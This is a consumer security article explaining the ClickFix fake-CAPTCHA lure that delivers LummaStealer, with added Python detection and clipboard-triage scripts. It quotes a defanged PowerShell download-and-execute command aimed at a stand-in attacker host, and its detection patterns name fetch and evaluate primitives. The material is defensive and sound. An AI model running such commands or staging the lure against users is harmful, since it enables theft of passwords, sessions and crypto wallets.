The Fake CAPTCHA That Wants You to Run a Command

A sneaky social engineering attack is tricking people into infecting their own computers. Here's how ClickFix works and how to spot it.

There's a nasty trick circulating that flips the usual malware delivery on its head. Instead of exploiting a vulnerability or tricking you into downloading a file, attackers are convincing people to infect themselves — by copying and pasting commands they don't understand.

It's called ClickFix, and according to new research from Bitdefender, it's driving a surge in LummaStealer infections across Europe and beyond.

Here's how it works, and how to make sure you never fall for it.

The Setup

You're browsing normally. Maybe you clicked an ad, followed a link from social media, or landed on a compromised website. Suddenly you see what looks like a verification prompt:

"Verify you are human"

Or sometimes:

"Your browser needs to verify this action"

Below it are step-by-step instructions. They look official. Professional, even. The page might have Google branding, a Cloudflare logo, or some other trusted company's styling.

The instructions tell you to:

  1. Press Win + R (opens the Windows Run dialog)
  2. Press Ctrl + V (paste from clipboard)
  3. Press Enter (execute the command)

What you don't realize is that visiting the page already copied a malicious command to your clipboard. By following the "verification" steps, you're running that command yourself.

What's Actually Happening

That command you just pasted? It's usually PowerShell code that:

  1. Downloads a script from an attacker-controlled server
  2. Runs it directly in memory (so antivirus might not catch it)
  3. Installs malware — typically an infostealer like LummaStealer

The whole infection chain relies on you doing the work. You opened the Run dialog. You pasted the command. You hit Enter. From the computer's perspective, you did this intentionally.

This is what makes ClickFix so clever (and so dangerous). Traditional security warnings are designed to stop programs from doing dangerous things without your permission. But you just gave permission. Explicitly.
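For defenders, the chain described above has a recognizable shape in endpoint telemetry: a shell started from the user's desktop session (the Run dialog is a child of explorer.exe) with a hidden window and a fetch-then-evaluate command line. The following is an added example, not code from the article or from Bitdefender's research; the event field names are assumptions to be mapped onto your EDR or Sysmon output, and the sample events are constructed (only the first command line is the one the article quotes).

```python
import re

# Constructed sample process-creation events (not real telemetry). The field
# names are assumptions; map them onto whatever your EDR or Sysmon pipeline emits.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # The ClickFix chain: the Run dialog (a child of explorer.exe) starts
    # PowerShell with a hidden window that fetches and evaluates remote code.
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": 'powershell -w h -c "IEX(irm hxxps://evil.site/x)"'},
    # A user running a local script by hand: same parent, no remote fetch.
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r"powershell -NoProfile -File C:\Users\me\backup.ps1"},
    # The same download cradle started by a service: worth its own rule in some
    # fleets, but not ClickFix, which always begins with a user-launched shell.
    {"parent": r"C:\Program Files\Vendor\Agent.exe", "image": PS,
     "cmdline": 'powershell -w h -c "IEX(irm https://updates.vendor.invalid/u.ps1)"'},
]

SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")
INTERACTIVE_PARENTS = ("explorer.exe",)
# Download and evaluate primitives, including the short aliases the lure relies
# on so that the command reads as gibberish to the victim.
FETCH = re.compile(r"\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest|DownloadString|curl|wget)\b", re.I)
EXEC = re.compile(r"\b(iex|Invoke-Expression)\b", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
URL = re.compile(r"\b(?:h?xxps?|https?)://\S+", re.I)


def clickfix_findings(event):
    """Reasons this event matches the ClickFix execution chain; empty list = no match."""
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    image = event["image"].lower().rsplit("\\", 1)[-1]
    cmd = event["cmdline"]
    if parent not in INTERACTIVE_PARENTS or image not in SHELLS:
        return []  # scoped to a shell started from the user's desktop session
    if not (FETCH.search(cmd) and EXEC.search(cmd)):
        return []  # the fetch-and-evaluate pair is the core of the chain
    reasons = ["remote code fetched and evaluated in memory"]
    if HIDDEN.search(cmd):
        reasons.append("console window hidden from the user")
    if URL.search(cmd):
        reasons.append("URL passed on the command line")
    return reasons


def scan(events):
    """Return (cmdline, reasons) for every event that matches."""
    hits = [(e["cmdline"], clickfix_findings(e)) for e in events]
    return [(c, r) for c, r in hits if r]


if __name__ == "__main__":
    for cmdline, reasons in scan(SAMPLE_EVENTS):
        print("ALERT:", cmdline, "|", "; ".join(reasons))
```

The rule deliberately requires both a fetch and an evaluate token so that a hidden-window local script is not a hit; a cradle with a different fetch primitive than those listed will need the pattern extended.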

Why It Works

The attack exploits a few things about how we use computers:

We're trained to complete CAPTCHAs. After years of "click all the traffic lights" and "prove you're not a robot," verification prompts feel routine. We don't question them.

The steps look simple and harmless. Press this, paste that, done. There's nothing obviously scary about it. No download button, no .exe file, no warning dialog.

Most people don't know what PowerShell is. If you've never used it, a command like powershell -w h -c "IEX(irm hxxps://evil.site/x)" is meaningless gibberish. You have no way to evaluate whether it's dangerous.

It bypasses security tools. Because you're running the command manually, there's no suspicious email attachment, no dodgy download, no browser warning to trigger.

What the Malware Does

The current wave of ClickFix attacks is dropping LummaStealer, an infostealer that was disrupted by law enforcement in 2025 but has since rebuilt itself.

Once running, LummaStealer targets:

  • Saved passwords in Chrome, Firefox, Edge, and other browsers
  • Session cookies that let attackers log into your accounts without needing your password
  • Cryptocurrency wallets (Metamask, Phantom, and others)
  • Browser-based two-factor authentication extensions, if you use them
  • VPN configurations and credentials
  • Documents that might contain sensitive information

Everything gets packaged up and sent to the attackers. Your accounts, your crypto, your identity — all compromised because you followed three simple steps on what looked like a routine verification page.

How to Spot It

The good news: these attacks are easy to avoid once you know what to look for.

No Legitimate Site Asks You to Run Commands

This is the golden rule. No real CAPTCHA, no real verification system, no real browser check will ever ask you to:

  • Open the Run dialog (Win + R)
  • Open PowerShell or Command Prompt
  • Paste anything into a terminal
  • Run any command

If a website asks you to do any of this, it's a scam. Full stop. Close the tab immediately.

Check Your Clipboard

If you're suspicious, before doing anything else, open Notepad and press Ctrl + V. See what's in your clipboard. If it's a command you didn't copy — especially one with "powershell," "cmd," "IEX," "irm," or a URL you don't recognize — that page was trying to infect you.

Delete the clipboard contents (copy something harmless like a space character) and close the browser tab.
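The Notepad check above can be scripted for people who will not recognize the indicators by eye. This is an added example, not code from the article: it classifies whatever text is on the clipboard, spells out what the short PowerShell forms in the article's sample command actually do, and, when run interactively, overwrites a dangerous clipboard with a space as the text advises. The alias list is a small constructed selection and tkinter is assumed to be available for the interactive part.

```python
import re

# The command the article quotes, used here as the worked input.
SAMPLE = 'powershell -w h -c "IEX(irm hxxps://evil.site/x)"'

# Short PowerShell forms a ClickFix command leans on, expanded to what they do.
# Assumption: a small, non-exhaustive list chosen to cover the lure on this page.
ALIASES = {
    "iex": "Invoke-Expression: run the downloaded text as code",
    "irm": "Invoke-RestMethod: download from a URL",
    "iwr": "Invoke-WebRequest: download from a URL",
    "-w h": "-WindowStyle Hidden: hide the console window",
    "-ep bypass": "-ExecutionPolicy Bypass: ignore script policy",
}
LAUNCHERS = ("powershell", "pwsh", "cmd", "mshta")
# Defanged hxxp(s):// as well as real URLs; stop at whitespace, quotes or parens.
URL = re.compile(r"\b(?:h?xxps?|https?)://[^\s\"')]+", re.I)


def triage(text):
    """Classify clipboard text as 'DANGER', 'REVIEW' or 'OK' with plain-English reasons."""
    lower = text.lower()
    launchers = [n for n in LAUNCHERS if re.search(rf"\b{n}\b", lower)]
    aliases = [f"{s} = {m}" for s, m in ALIASES.items()
               if re.search(r"(?<!\w)" + re.escape(s) + r"(?!\w)", lower)]
    urls = URL.findall(text)
    reasons = ([f"launches {n}" for n in launchers] + aliases
               + [f"contacts {u}" for u in urls])
    if launchers and (aliases or urls):
        # A shell plus a download/evaluate step or a URL is the ClickFix shape.
        return "DANGER", reasons
    return ("REVIEW" if reasons else "OK"), reasons


if __name__ == "__main__":
    # Interactive use: read the real clipboard with tkinter (assumed available)
    # and, if it is dangerous, overwrite it with a space as the text advises.
    import tkinter
    root = tkinter.Tk()
    root.withdraw()
    try:
        clip = root.clipboard_get()
    except tkinter.TclError:
        clip = ""  # clipboard empty or not text
    verdict, reasons = triage(clip)
    print(verdict, *reasons, sep="\n  ")
    if verdict == "DANGER":
        root.clipboard_clear()
        root.clipboard_append(" ")
        root.update()
    root.destroy()
```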

Look for Pressure Tactics

These pages often create urgency:

  • "Your session will expire"
  • "Complete verification to continue"
  • "Security check required"
  • Timer counting down

Real verification systems don't threaten you. If a page is pushing you to act fast, that's a red flag.

The Page Appeared Out of Nowhere

ClickFix pages typically appear through:

  • Malicious ads (malvertising)
  • Compromised websites
  • Phishing links in emails or messages
  • Search engine results for pirated content

If you weren't doing anything that would normally require verification, why would you suddenly need to verify yourself?

What to Do If You Fell For It

If you already ran the command:

Immediately

  1. Disconnect from the internet — Wi-Fi off, cable unplugged. This might prevent data from being sent to the attackers.

  2. Don't log into anything else — Any credentials you enter now might get captured.

Within the Next Hour

  1. Run a full malware scan — Use Malwarebytes (free version is fine) in addition to Windows Defender. Infostealers are often detected better by secondary scanners.

  2. Check Task Manager — Look for unfamiliar processes using CPU or network. LummaStealer infections often show as random-named executables.

  3. Check startup programs — Settings → Apps → Startup. Disable anything you don't recognize.

After You've Cleaned Up

  1. Change your passwords — Every account. Start with email, banking, and anything financial. Use a different device if possible.

  2. Check for unauthorized access — Log into your important accounts and check recent activity. Look for logins from unfamiliar locations or devices.

  3. Enable 2FA everywhere — If you haven't already. Use an authenticator app, not SMS.

  4. Check your cryptocurrency — If you have any. Wallet drainers act fast.

  5. Monitor your accounts — Watch for suspicious activity over the next few weeks. Consider a credit freeze if you're in a country where that's available.

The Takeaway

ClickFix has been around since 2024, but it's surging now. Multiple criminal groups are using it, and the wrappers keep evolving — fake browser updates, fake error messages, fake CAPTCHAs.

But the defense stays the same: legitimate websites never ask you to run commands.

Tattoo it on your brain. Tell your family. The moment any website asks you to open PowerShell or the Run dialog, you're looking at an attack. Close the tab. Done.

Sources: Bitdefender, BleepingComputer
